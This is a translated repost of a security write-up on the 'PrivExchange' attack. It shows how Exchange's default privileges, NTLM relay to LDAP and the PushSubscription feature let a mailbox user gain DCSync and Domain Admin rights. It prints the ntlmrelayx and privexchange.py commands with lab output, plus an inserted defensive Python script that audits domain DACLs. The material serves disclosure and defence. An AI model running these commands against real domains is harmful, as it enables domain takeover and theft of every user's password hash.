myhack58 / 佚名 (anonymous) / MYHACK58:62201992741
History: Jan 25, 2019 - 12:00 a.m.

Analysis of the latest Exchange Server privilege escalation vulnerability - Vulnerability alerts - Black Bar Security Net (myhack58)

2019-01-25 00:00:00
佚名 (anonymous)
www.myhack58.com

CVSS3: 7.4 High
Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
Attack Vector: NETWORK
Attack Complexity: HIGH
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: NONE

CVSS2: 5.8 Medium
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:N
Access Vector: NETWORK
Access Complexity: MEDIUM
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: NONE

EPSS: 0.052 Low (percentile 92.2%)

In most organizations that use Active Directory and Exchange, the Exchange servers hold very high privileges: an Exchange Server administrator can escalate to Domain Admin. I recently read a ZDI article (on the technical details of CVE-2018-8581 and its exploitation) that describes a way to make Exchange authenticate to an attacker over HTTP using NTLM. I think the vulnerability goes further than that: combined with an NTLM relay attack, it allows a low-privileged user (any user with a mailbox) to escalate to Domain Admin. In the default configuration, I have seen about 90% of Exchange organizations exposed to this attack, and at the time of writing there is no patch, so for now the privilege escalation can only be prevented with mitigations. This article describes the attack in detail, along with some of the more technical details, the corresponding mitigations, and a proof of concept. I will refer to the attack as "PrivExchange".

A new combination of known vulnerabilities
This article combines a number of known vulnerabilities and known protocol weaknesses into a new attack method. Three parts are combined, which together allow escalation from a low-privileged user (any user with a mailbox) to Domain Admin:
By default, Exchange Server has excessively high privileges
NTLM authentication is vulnerable to relay attacks
Exchange has a feature that makes the Exchange Server's computer account authenticate to the attacker

Exchange and its high privileges
The main problem here is that Exchange has high privileges in the Active Directory domain. The Exchange Windows Permissions group has WriteDacl access on the Domain object in Active Directory, which allows any member of that group to modify the domain's permissions, including the right to perform DCSync operations. With that right, a user or computer can perform the synchronization operations that domain controllers normally use for replication, which lets an attacker synchronize the password hashes of all users in Active Directory. Several researchers have written about this before (see the references at the end of the article), and last year my Fox-IT colleague Rindert and I wrote an article on it as well. In that article I also published an update to ntlmrelayx (https://github.com/SecureAuthCorp/impacket/blob/master/examples/ntlmrelayx.py) that adds these Access Control List (ACL) based attacks to NTLM relaying.

NTLM relay attacks
NTLM relay attacks are not a new technique. Previously the main focus was on relaying NTLM authentication over SMB in order to execute code on other hosts. Unfortunately, this only works where SMB signing is not enabled, so on most company networks this method cannot be used. Other protocols are also vulnerable to relay attacks, however. In my opinion the most interesting protocol is LDAP, which can be used to read and modify (Active) Directory objects. The following link gives an overview of NTLM relay attacks (https://www.fox-it.com/en/insights/blogs/blog/inside-windows-network/). In the simplest form of the attack, when no configuration is in place to block it, the authentication that Windows performs (automatically) when it connects to the attacker's computer can be relayed to another computer on the network, as shown below:
![](/Article/UploadPic/2019-1/201912514259340.png)
When this authentication is relayed to LDAP, Directory objects can be modified to grant the attacker privileges, including the rights required for DCSync.
So if we can make the Exchange Server authenticate to us using NTLM authentication, we can perform the ACL attack. Note that relaying to LDAP is only possible when the victim authenticates to us via HTTP and not via SMB (this is covered in the technical details section).
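As an added defensive example (not code from the article, privexchange.py or ntlmrelayx), the following Python audits a domain object's DACL in SDDL form for the two conditions the sections above describe: trustees holding WriteDacl on the domain (the Exchange Windows Permissions situation) and trustees holding the DS-Replication-Get-Changes rights that the relayed LDAP write grants. The domain SIDs, RIDs and the sample SDDL are constructed; the two GUIDs are the well-known replication extended rights.

```python
# Audit a domain object's DACL (as an SDDL string) for the rights the PrivExchange chain abuses:
# WriteDacl/WriteOwner (lets a trustee grant itself DCSync) and the replication extended rights.
import re

# Well-known Microsoft extended-right GUIDs that together allow DCSync
DCSYNC_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
# SDDL aliases expected to hold such rights: SYSTEM, Builtin Admins, Domain/Enterprise Admins, Enterprise DCs
EXPECTED_TRUSTEES = {"SY", "BA", "DA", "EA", "ED"}

def parse_dacl(sddl):
    """Return the DACL's Access-Allowed ACEs as (ace_type, right_codes, object_guid, trustee)."""
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]  # text between "D:" and an optional SACL "S:"
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", dacl):
        f = ace.split(";")
        if len(f) < 6 or f[0] not in ("A", "OA") or f[2].startswith("0x"):
            continue  # deny ACEs and numeric access masks are out of scope for this example
        codes = {f[2][i:i + 2] for i in range(0, len(f[2]), 2)}  # two-letter right codes, e.g. WD
        aces.append((f[0], codes, f[3].lower(), f[5]))
    return aces

def audit_domain_dacl(sddl, expected=EXPECTED_TRUSTEES):
    """Return [(trustee, reason)] for each unexpected trustee that could DCSync the domain."""
    findings = []
    for _ace_type, codes, guid, trustee in parse_dacl(sddl):
        if trustee in expected:
            continue
        if codes & {"GA", "WD", "WO"}:
            findings.append((trustee, "WriteDacl/WriteOwner: can grant itself DCSync rights"))
        elif "CR" in codes and not guid:
            findings.append((trustee, "all extended rights, including replication"))
        elif "CR" in codes and guid in DCSYNC_GUIDS:
            findings.append((trustee, DCSYNC_GUIDS[guid]))
    return findings

# Constructed sample: a domain DACL after the attack. RID 1120 stands in for the
# "Exchange Windows Permissions" group, RID 1105 for the escalated low-privileged user.
SAMPLE_SDDL = (
    "O:DAG:DAD:AI(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;DA)"
    "(A;;RPLCLORC;;;AU)"
    "(A;CI;RPWPCCDCLCLORCWOWDSDDTSW;;;S-1-5-21-1111-2222-3333-1120)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111-2222-3333-1105)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111-2222-3333-1105)"
)
print(audit_domain_dacl(SAMPLE_SDDL))
```

On a real domain the SDDL can be read with the Active Directory module (`(Get-Acl "AD:\DC=...").Sddl`) or any LDAP client that returns nTSecurityDescriptor; the Exchange group's ACE carries WriteDacl, and an attacker-added replication ACE shows up as a non-DC trustee with the two GUIDs.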

Making Exchange authenticate to us
So far the only missing part is a simple way to make Exchange authenticate to us. ZDI researchers found that the Exchange PushSubscription feature makes Exchange authenticate via HTTP to an arbitrary URL. In their article (https://www.thezdi.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange) they use this to relay the NTLM authentication back to Exchange (a so-called reflection attack) and impersonate other users. If we instead combine this with Exchange's high default privileges and perform a relay attack rather than a reflection attack, we can use those privileges to grant ourselves DCSync rights. The push notification service has an option to send a message every X minutes (where X is chosen by the attacker), even if no event occurs and no new mail arrives in the Inbox, which guarantees that Exchange will connect to us.

Performing the privilege escalation attack
The following diagram shows the attack and the steps performed to escalate privileges:
![](/Article/UploadPic/2019-1/201912514259776.png)
We need two tools to perform the attack: privexchange.py (https://github.com/dirkjanm/privexchange/) and ntlmrelayx (https://github.com/SecureAuthCorp/impacket/). We start ntlmrelayx in relay mode with LDAP on the domain controller as the target, escalating the privileges of the user ntu, which the attacker controls:
ntlmrelayx.py -t ldap://s2016dc.testsegment.local --escalate-user ntu
Now we run the privexchange.py script:
user@localhost:~/exchpoc$ python privexchange.py -ah dev.testsegment.local s2012exc.testsegment.local -u ntu -d testsegment.local
Password:
INFO: Using attacker URL: http://dev.testsegment.local/privexchange/
INFO: Exchange returned an HTTP status 200 - authentication was OK
ERROR: The user you authenticated with does not have a mailbox associated. Try a different user.
When the script is run with a user that has no mailbox, we get the error above. We try again with a user that does have a mailbox:
user@localhost:~/exchpoc$ python privexchange.py -ah dev.testsegment.local s2012exc.testsegment.local -u testuser -d testsegment.local
Password:
INFO: Using attacker URL: http://dev.testsegment.local/privexchange/
INFO: Exchange returned an HTTP status 200 - authentication was OK
INFO: the API call was successful
After a minute (the interval we configured), we see the connection arrive at ntlmrelayx, which grants our user DCSync privileges:
![](/Article/UploadPic/2019-1/201912514259407.png)
